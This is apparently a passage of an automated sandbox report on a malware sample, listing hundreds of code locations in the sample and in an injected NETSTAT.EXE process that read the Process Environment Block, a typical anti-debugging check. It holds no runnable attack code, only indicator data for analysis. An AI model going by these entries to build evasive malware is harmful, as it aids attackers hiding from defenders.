Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h] | 2_2_00BA03E2
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA03E2 mov eax, dword ptr fs:[00000030h] | 2_2_00BA03E2
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C45BA5 mov eax, dword ptr fs:[00000030h] | 2_2_00C45BA5
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF53CA mov eax, dword ptr fs:[00000030h] | 2_2_00BF53CA
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF53CA mov eax, dword ptr fs:[00000030h] | 2_2_00BF53CA
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C48B58 mov eax, dword ptr fs:[00000030h] | 2_2_00C48B58
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA3B7A mov eax, dword ptr fs:[00000030h] | 2_2_00BA3B7A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA3B7A mov eax, dword ptr fs:[00000030h] | 2_2_00BA3B7A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7DB60 mov ecx, dword ptr fs:[00000030h] | 2_2_00B7DB60
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C3131B mov eax, dword ptr fs:[00000030h] | 2_2_00C3131B
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7F358 mov eax, dword ptr fs:[00000030h] | 2_2_00B7F358
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B7DB40 mov eax, dword ptr fs:[00000030h] | 2_2_00B7DB40
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C48CD6 mov eax, dword ptr fs:[00000030h] | 2_2_00C48CD6
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B8849B mov eax, dword ptr fs:[00000030h] | 2_2_00B8849B
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C314FB mov eax, dword ptr fs:[00000030h] | 2_2_00C314FB
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h] | 2_2_00BF6CF0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h] | 2_2_00BF6CF0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6CF0 mov eax, dword ptr fs:[00000030h] | 2_2_00BF6CF0
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0C450 mov eax, dword ptr fs:[00000030h] | 2_2_00C0C450
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C0C450 mov eax, dword ptr fs:[00000030h] | 2_2_00C0C450
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BABC2C mov eax, dword ptr fs:[00000030h] | 2_2_00BABC2C
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h] | 2_2_00BF6C0A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h] | 2_2_00BF6C0A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h] | 2_2_00BF6C0A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BF6C0A mov eax, dword ptr fs:[00000030h] | 2_2_00BF6C0A
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C31C06 mov eax, dword ptr fs:[00000030h] | 2_2_00C31C06
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h] | 2_2_00C4740D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h] | 2_2_00C4740D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00C4740D mov eax, dword ptr fs:[00000030h] | 2_2_00C4740D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00B9746D mov eax, dword ptr fs:[00000030h] | 2_2_00B9746D
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BAA44B mov eax, dword ptr fs:[00000030h] | 2_2_00BAA44B
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h] | 2_2_00BA1DB5
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h] | 2_2_00BA1DB5
Source: C:\Users\user\Desktop\Y4U48592345670954.exe | Code function: 2_2_00BA1DB5 mov eax, dword ptr fs:[00000030h] | 2_2_00BA1DB5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA35A1 mov eax, dword ptr fs:[00000030h]2_2_00BA35A1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAFD9B mov eax, dword ptr fs:[00000030h]2_2_00BAFD9B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAFD9B mov eax, dword ptr fs:[00000030h]2_2_00BAFD9B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C3FDE2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C3FDE2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C3FDE2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3FDE2 mov eax, dword ptr fs:[00000030h]2_2_00C3FDE2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C28DF1 mov eax, dword ptr fs:[00000030h]2_2_00C28DF1
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]2_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]2_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]2_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA2581 mov eax, dword ptr fs:[00000030h]2_2_00BA2581
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B72D8A mov eax, dword ptr fs:[00000030h]2_2_00B72D8A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]2_2_00B8D5E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8D5E0 mov eax, dword ptr fs:[00000030h]2_2_00B8D5E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C405AC mov eax, dword ptr fs:[00000030h]2_2_00C405AC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C405AC mov eax, dword ptr fs:[00000030h]2_2_00C405AC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov ecx, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF6DC9 mov eax, dword ptr fs:[00000030h]2_2_00BF6DC9
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]2_2_00BA4D3B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]2_2_00BA4D3B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA4D3B mov eax, dword ptr fs:[00000030h]2_2_00BA4D3B
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7AD30 mov eax, dword ptr fs:[00000030h]2_2_00B7AD30
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BFA537 mov eax, dword ptr fs:[00000030h]2_2_00BFA537
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B83D34 mov eax, dword ptr fs:[00000030h]2_2_00B83D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C577 mov eax, dword ptr fs:[00000030h]2_2_00B9C577
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9C577 mov eax, dword ptr fs:[00000030h]2_2_00B9C577
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B97D50 mov eax, dword ptr fs:[00000030h]2_2_00B97D50
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48D34 mov eax, dword ptr fs:[00000030h]2_2_00C48D34
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB3D43 mov eax, dword ptr fs:[00000030h]2_2_00BB3D43
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3E539 mov eax, dword ptr fs:[00000030h]2_2_00C3E539
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF3540 mov eax, dword ptr fs:[00000030h]2_2_00BF3540
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2FEC0 mov eax, dword ptr fs:[00000030h]2_2_00C2FEC0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48ED6 mov eax, dword ptr fs:[00000030h]2_2_00C48ED6
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF46A7 mov eax, dword ptr fs:[00000030h]2_2_00BF46A7
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FE87 mov eax, dword ptr fs:[00000030h]2_2_00C0FE87
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA16E0 mov ecx, dword ptr fs:[00000030h]2_2_00BA16E0
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B876E2 mov eax, dword ptr fs:[00000030h]2_2_00B876E2
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]2_2_00C40EA5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]2_2_00C40EA5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C40EA5 mov eax, dword ptr fs:[00000030h]2_2_00C40EA5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA36CC mov eax, dword ptr fs:[00000030h]2_2_00BA36CC
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB8EC7 mov eax, dword ptr fs:[00000030h]2_2_00BB8EC7
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AE44 mov eax, dword ptr fs:[00000030h]2_2_00C3AE44
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C3AE44 mov eax, dword ptr fs:[00000030h]2_2_00C3AE44
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7E620 mov eax, dword ptr fs:[00000030h]2_2_00B7E620
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA61C mov eax, dword ptr fs:[00000030h]2_2_00BAA61C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA61C mov eax, dword ptr fs:[00000030h]2_2_00BAA61C
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]2_2_00B7C600
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]2_2_00B7C600
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B7C600 mov eax, dword ptr fs:[00000030h]2_2_00B7C600
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BA8E00 mov eax, dword ptr fs:[00000030h]2_2_00BA8E00
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9AE73 mov eax, dword ptr fs:[00000030h]2_2_00B9AE73
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C31608 mov eax, dword ptr fs:[00000030h]2_2_00C31608
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8766D mov eax, dword ptr fs:[00000030h]2_2_00B8766D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B87E41 mov eax, dword ptr fs:[00000030h]2_2_00B87E41
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C2FE3F mov eax, dword ptr fs:[00000030h]2_2_00C2FE3F
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]2_2_00BF7794
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]2_2_00BF7794
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BF7794 mov eax, dword ptr fs:[00000030h]2_2_00BF7794
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B88794 mov eax, dword ptr fs:[00000030h]2_2_00B88794
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BB37F5 mov eax, dword ptr fs:[00000030h]2_2_00BB37F5
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAE730 mov eax, dword ptr fs:[00000030h]2_2_00BAE730
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B74F2E mov eax, dword ptr fs:[00000030h]2_2_00B74F2E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B74F2E mov eax, dword ptr fs:[00000030h]2_2_00B74F2E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C48F6A mov eax, dword ptr fs:[00000030h]2_2_00C48F6A
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B9F716 mov eax, dword ptr fs:[00000030h]2_2_00B9F716
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA70E mov eax, dword ptr fs:[00000030h]2_2_00BAA70E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00BAA70E mov eax, dword ptr fs:[00000030h]2_2_00BAA70E
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4070D mov eax, dword ptr fs:[00000030h]2_2_00C4070D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C4070D mov eax, dword ptr fs:[00000030h]2_2_00C4070D
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FF10 mov eax, dword ptr fs:[00000030h]2_2_00C0FF10
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00C0FF10 mov eax, dword ptr fs:[00000030h]2_2_00C0FF10
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8FF60 mov eax, dword ptr fs:[00000030h]2_2_00B8FF60
          Source: C:\Users\user\Desktop\Y4U48592345670954.exeCode function: 2_2_00B8EF40 mov eax, dword ptr fs:[00000030h]2_2_00B8EF40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03871B8F mov eax, dword ptr fs:[00000030h]4_2_03871B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03871B8F mov eax, dword ptr fs:[00000030h]4_2_03871B8F
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0391D380 mov ecx, dword ptr fs:[00000030h]4_2_0391D380
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392138A mov eax, dword ptr fs:[00000030h]4_2_0392138A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389B390 mov eax, dword ptr fs:[00000030h]4_2_0389B390
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892397 mov eax, dword ptr fs:[00000030h]4_2_03892397
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]4_2_03894BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]4_2_03894BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03894BAD mov eax, dword ptr fs:[00000030h]4_2_03894BAD
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03935BA5 mov eax, dword ptr fs:[00000030h]4_2_03935BA5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E53CA mov eax, dword ptr fs:[00000030h]4_2_038E53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038E53CA mov eax, dword ptr fs:[00000030h]4_2_038E53CA
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0388DBE9 mov eax, dword ptr fs:[00000030h]4_2_0388DBE9
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038903E2 mov eax, dword ptr fs:[00000030h]4_2_038903E2
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392131B mov eax, dword ptr fs:[00000030h]4_2_0392131B
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386DB40 mov eax, dword ptr fs:[00000030h]4_2_0386DB40
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03938B58 mov eax, dword ptr fs:[00000030h]4_2_03938B58
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386F358 mov eax, dword ptr fs:[00000030h]4_2_0386F358
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386DB60 mov ecx, dword ptr fs:[00000030h]4_2_0386DB60
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03893B7A mov eax, dword ptr fs:[00000030h]4_2_03893B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03893B7A mov eax, dword ptr fs:[00000030h]4_2_03893B7A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389D294 mov eax, dword ptr fs:[00000030h]4_2_0389D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389D294 mov eax, dword ptr fs:[00000030h]4_2_0389D294
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038652A5 mov eax, dword ptr fs:[00000030h]4_2_038652A5
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387AAB0 mov eax, dword ptr fs:[00000030h]4_2_0387AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0387AAB0 mov eax, dword ptr fs:[00000030h]4_2_0387AAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0389FAB0 mov eax, dword ptr fs:[00000030h]4_2_0389FAB0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892ACB mov eax, dword ptr fs:[00000030h]4_2_03892ACB
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03892AE4 mov eax, dword ptr fs:[00000030h]4_2_03892AE4
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AA16 mov eax, dword ptr fs:[00000030h]4_2_0392AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0392AA16 mov eax, dword ptr fs:[00000030h]4_2_0392AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03878A0A mov eax, dword ptr fs:[00000030h]4_2_03878A0A
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AA16 mov eax, dword ptr fs:[00000030h]4_2_0386AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_0386AA16 mov eax, dword ptr fs:[00000030h]4_2_0386AA16
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03883A1C mov eax, dword ptr fs:[00000030h]4_2_03883A1C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]4_2_03865210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov ecx, dword ptr fs:[00000030h]4_2_03865210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]4_2_03865210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03865210 mov eax, dword ptr fs:[00000030h]4_2_03865210
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A4A2C mov eax, dword ptr fs:[00000030h]4_2_038A4A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_038A4A2C mov eax, dword ptr fs:[00000030h]4_2_038A4A2C
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]4_2_03869240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]4_2_03869240
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 4_2_03869240 mov eax, dword ptr fs:[00000030h]4_2_03869240
